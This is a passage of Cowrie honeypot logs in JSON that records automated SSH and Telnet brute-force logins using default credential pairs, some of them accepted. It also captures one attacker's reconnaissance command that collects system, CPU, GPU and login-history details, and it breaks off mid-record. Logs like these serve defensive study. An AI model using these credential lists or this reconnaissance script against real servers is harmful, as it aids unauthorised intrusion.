{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56288,"dst_ip":"1.2.3.4","dst_port":22,"session":"a88b09a87935","protocol":"ssh","message":"New connection: 212.227.235.229:56288 (1.2.3.4:22) [session: a88b09a87935]","sensor":"my-vps","timestamp":"2025-08-31T04:56:23.506974Z"}
{"eventid":"cowrie.login.success","username":"root","password":"London!","message":"login attempt [root/London!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:56:25.362345Z","src_ip":"79.127.48.196","session":"33e408ff24da"}
{"eventid":"cowrie.session.connect","src_ip":"112.167.126.78","src_port":38896,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d78fa675f95","protocol":"telnet","message":"New connection: 112.167.126.78:38896 (1.2.3.4:23) [session: 6d78fa675f95]","sensor":"my-vps","timestamp":"2025-08-31T04:56:27.974357Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56292,"dst_ip":"1.2.3.4","dst_port":22,"session":"b43a88e7f600","protocol":"ssh","message":"New connection: 212.227.235.229:56292 (1.2.3.4:22) [session: b43a88e7f600]","sensor":"my-vps","timestamp":"2025-08-31T04:56:28.734777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:56:28.737379Z","src_ip":"212.227.235.229","session":"b43a88e7f600"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:56:28.998786Z","src_ip":"212.227.235.229","session":"b43a88e7f600"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:29.027112Z","src_ip":"212.227.125.160","session":"a49c3124a351"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:30.279896Z","src_ip":"212.227.235.229","session":"a88b09a87935"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:56:30.281596Z","src_ip":"212.227.235.229","session":"a88b09a87935"}
{"eventid":"cowrie.login.failed","username":"sales","password":"sales","message":"login attempt [sales/sales] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:30.490419Z","src_ip":"212.227.235.229","session":"b43a88e7f600"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:31.758931Z","src_ip":"212.227.235.229","session":"b43a88e7f600"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50572,"dst_ip":"1.2.3.4","dst_port":22,"session":"101a9a69fc87","protocol":"ssh","message":"New connection: 212.227.125.160:50572 (1.2.3.4:22) [session: 101a9a69fc87]","sensor":"my-vps","timestamp":"2025-08-31T04:56:33.252687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:33.253340Z","src_ip":"212.227.125.160","session":"101a9a69fc87"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:56:33.436206Z","src_ip":"212.227.125.160","session":"101a9a69fc87"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:33.986336Z","src_ip":"212.227.125.160","session":"101a9a69fc87"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:35.173071Z","src_ip":"212.227.125.160","session":"101a9a69fc87"}
{"eventid":"cowrie.session.closed","duration":"45.7","message":"Connection lost after 45.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:35.623068Z","src_ip":"212.227.125.160","session":"a49c3124a351"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60404,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b01699f3a18","protocol":"ssh","message":"New connection: 217.72.205.35:60404 (1.2.3.4:22) [session: 0b01699f3a18]","sensor":"my-vps","timestamp":"2025-08-31T04:56:38.986932Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:38.988211Z","src_ip":"217.72.205.35","session":"0b01699f3a18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38770,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d6896b614b9","protocol":"ssh","message":"New connection: 212.227.235.229:38770 (1.2.3.4:22) [session: 1d6896b614b9]","sensor":"my-vps","timestamp":"2025-08-31T04:56:41.585719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:42.403535Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:56:42.404535Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48540,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdea51d560b8","protocol":"ssh","message":"New connection: 212.227.125.160:48540 (1.2.3.4:22) [session: fdea51d560b8]","sensor":"my-vps","timestamp":"2025-08-31T04:56:43.860546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:56:43.861478Z","src_ip":"212.227.125.160","session":"fdea51d560b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:56:44.052607Z","src_ip":"212.227.125.160","session":"fdea51d560b8"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:44.620766Z","src_ip":"212.227.125.160","session":"fdea51d560b8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:45.812587Z","src_ip":"212.227.125.160","session":"fdea51d560b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46088,"dst_ip":"1.2.3.4","dst_port":22,"session":"e63e06f8b08b","protocol":"ssh","message":"New connection: 212.227.235.229:46088 (1.2.3.4:22) [session: e63e06f8b08b]","sensor":"my-vps","timestamp":"2025-08-31T04:56:47.663089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:56:47.664220Z","src_ip":"212.227.235.229","session":"e63e06f8b08b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:56:47.792672Z","src_ip":"212.227.235.229","session":"e63e06f8b08b"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:56:47.841657Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"Aa12345678@@","message":"login attempt [ansible/Aa12345678@@] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:48.352855Z","src_ip":"212.227.235.229","session":"e63e06f8b08b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51706,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ea54d131f0c","protocol":"ssh","message":"New connection: 212.227.125.160:51706 (1.2.3.4:22) [session: 6ea54d131f0c]","sensor":"my-vps","timestamp":"2025-08-31T04:56:48.466455Z"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-31T04:56:48.963053Z","src_ip":"212.227.235.229","session":"a88b09a87935"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59322,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c1014fcc831","protocol":"ssh","message":"New connection: 212.227.235.229:59322 (1.2.3.4:22) [session: 9c1014fcc831]","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.435006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.436402Z","src_ip":"212.227.235.229","session":"9c1014fcc831"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.480011Z","src_ip":"212.227.235.229","session":"e63e06f8b08b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:56:49.664359Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.665160Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.665865Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.666809Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.668383Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.668987Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.669491Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.670194Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.670595Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.671023Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.671487Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.672092Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:56:49.672672Z","src_ip":"212.227.235.229","session":"1d6896b614b9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512